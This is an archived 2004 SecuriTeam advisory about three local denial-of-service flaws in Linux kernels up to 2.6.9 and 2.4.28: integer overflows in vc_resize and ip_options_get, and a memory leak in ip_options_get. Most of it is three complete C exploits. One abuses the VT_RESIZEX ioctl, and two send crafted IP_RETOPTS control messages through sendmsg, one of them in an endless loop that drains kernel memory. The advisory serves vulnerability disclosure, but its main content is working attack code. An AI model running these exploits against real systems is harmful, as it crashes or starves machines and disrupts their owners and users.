[EXPL] Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)
From: SecuriTeam (support_at_securiteam.com)
Date: 12/16/04
- Previous message: SecuriTeam: "[REVS] Security Deficiencies of Automated Windows Installations"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 16 Dec 2004 11:31:06 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)
------------------------------------------------------------------------
SUMMARY
Three vulnerabilities have been found in the Linux Kernel, an integer
overflow in the vc_resize function, a memory leak in ip_options_get and an
integer overflow in ip_options_get. The vulnerabilities can at the very
least be used to cause a denial of service, in one case you can use it to
reveal arbitrary segments of the memory.
DETAILS
Vulnerable Systems:
* Linux kernel version 2.6 up to 2.6.9 (inclusive)
* Linux kernel version 2.4 up to 2.4.28 (inclusive)
Exploit (vc_resize):
/* vc_resize int overflow
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases
* */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>
int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;
fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;
/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;
system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}
Exploit (ip_options_get):
/* memory leak
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and
mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s,j,ma;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[24];
ma=250;
printf("just wait and watch memory usage\n");
memset(opts,0,sizeof(opts));
while(42)
{
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);
connect(s,(struct sockaddr *) &sockad, sizeof(sockad));
memset(msg,'v',sizeof(msg));
#define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024)
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
for(j=0;j<ma;j++)
{
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts));
}
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + 8;
msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);
msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len;
msghdr.msg_iov = iovector;
msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
if ((i = sendmsg(s, &msghdr, 0)) < 0)
{perror("sendmsg");return -42;}
close(s);
free(cmsg);
}
return 42;
}
/* int overflow in ip_options_get
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases (like securityfocus and
mitre)
* */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[12];
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);
connect(s,(struct sockaddr *) &sockad, sizeof(sockad));
memset(msg,'v',sizeof(msg));
memset(opts,0,sizeof(opts));
#define VV 1024*1024
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = -1;
msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);
msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + 420;
msghdr.msg_iov = iovector;
msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
system("sync");
if ((i = sendmsg(s, &msghdr, 0)) < 0)
perror("sendmsg");
return 42;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:guninski@guninski.com>
Georgi Guninski.
The original article can be found at:
<http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html>
http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[REVS] Security Deficiencies of Automated Windows Installations"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [TOOL] Snortcheck Tool: Check If Snort Its Running
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... struct addr { ...
int mac_aton; ... struct addr src, dst; ... (Securiteam) - [EXPL] Cisco IOS Next Hop Resolution Protocol DoS (NHRP, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int open_socket; ...
struct nhrp_h { ... (Securiteam) - [NT] Quicktime Player HTTP Error Message Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int hex2bin; ...
struct sockaddr_in peer; ... buff = NULL; ... (Securiteam) - [NEWS] Prestige 650R ADSL Router DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Prestige 600 fails to handle malformed
fragmented IP packets. ... int open_packet{ ... int send_packet(int s, struct
sockaddr_in saddr, struct sockaddr_in daddr, ... (Securiteam) - [EXPL] Remote rpc.mountd Exploit for xlog() Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int connect_host; ...
void do_xp; ... struct sockaddr_in sin; ... (Securiteam)
